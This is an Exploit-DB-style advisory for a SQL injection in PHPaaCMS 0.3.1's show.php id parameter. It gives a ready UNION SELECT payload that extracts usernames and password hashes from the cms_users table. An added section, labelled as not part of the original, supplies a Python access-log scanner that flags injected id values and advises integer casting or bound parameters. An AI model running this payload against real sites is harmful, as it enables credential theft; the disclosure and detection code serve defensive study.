PHPaaCMS 0.3.1 - 'show.php?id' SQL Injection

EDB-ID: 14199
Platform: PHP
Date: 2010-07-04


# Exploit Title: phpaaCms (show.php?id=) SQL Injection Vulnerability
# Software: http://www.phpaa.cn
# Tested on: Windows 7
# Category: webapp
# Code: n/a
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
 MWUHH TO Bl00dMafia: KashmiriMafia, Mirpuri, Mirzatun: gula, Boby, Mota & aSIM^JARRAL
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
       Gr33tz to  All PakISTANI Hackers 
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 

 
----- [ Founder ] -----
 
    Shafiq-Ur-rehman
 
----- [ Email] -----
 
    aol.shafiq@gmail.com
 
 
 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
 {{{TITLE}}}
 
PHPAA (show.php) SQL Injection Vulnerability
 
+++++[ Vendor ]+++++
 
http://www.phpaa.cn
 
                                                        
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 
----- [ SQL Injection ] -----
 
Append [SQL CODE] to the value of the id parameter:
 
[Link] http://server/phpaaCMS/show.php?id=1[SQL CODE]
 


             {Tested On}
 
----- [ Live Link (s) ] -----
 
[SQLi] http://<server>/show.php?id=1[CODE]
 
[SQLI] http://server/phpaaCMS/show.php?id=-194 union all select 1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15 from cms_users--
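
Added example (not part of the original advisory): a log check that flags requests to show.php whose id value is not a plain number or carries SQL of the kind shown above. It assumes combined-format access logs and that legitimate article ids are decimal integers; classify, scan and SAMPLE_LOG are hypothetical names, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a combined-format access log entry; lazy match tolerates raw spaces.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# SQL constructs of the kind the advisory's proof of concept uses.
SQLI_RE = re.compile(r"\bunion\b.*\bselect\b|\bconcat\s*\(|--|/\*|'", re.I | re.S)

def classify(log_line):
    """Return None for unrelated lines, else 'ok', 'non-numeric' or 'sqli'."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/show.php"):
        return None
    # parse_qs percent-decodes and maps '+' to a space, so encoded payloads match too.
    values = parse_qs(url.query, keep_blank_values=True).get("id", [])
    verdict = "ok" if values else None
    for value in values:
        if re.fullmatch(r"\d{1,10}", value):
            continue  # assumption: a plain article number is the only legitimate shape
        if SQLI_RE.search(value):
            return "sqli"
        verdict = "non-numeric"
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every show.php request worth reviewing."""
    hits = []
    for number, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict in ("non-numeric", "sqli"):
            hits.append((number, verdict))
    return hits

# Constructed sample log (documentation IP ranges); not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Jul/2010:10:00:01 +0000] "GET /phpaaCMS/show.php?id=12 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [04/Jul/2010:10:00:05 +0000] "GET /phpaaCMS/index.php HTTP/1.1" 200 2048',
    '198.51.100.7 - - [04/Jul/2010:10:02:11 +0000] "GET /phpaaCMS/show.php?id=-194%20union%20all'
    '%20select%201,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15'
    '%20from%20cms_users-- HTTP/1.1" 200 5301',
    '198.51.100.7 - - [04/Jul/2010:10:02:30 +0000] "GET /phpaaCMS/show.php?id=1abc HTTP/1.1" 200 310',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}")
```

A "non-numeric" hit is a lead for review rather than proof of injection; the durable fix is on the server side, where id should be cast to an integer or bound as a query parameter.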
 

 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  Thanks To All: www.Exploit-db.com | Ksecurity-team Members| 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
muwhhh>>> http://www.sql-injection-tools.blogspot.com
 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
     >>Live Long Pakistan<<
 
>>> Live Long Azad Kashmir<<<
 
>>> Proud To Be A Kashmiri+Pakistani<<<
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Bug discovered: 4 July 2010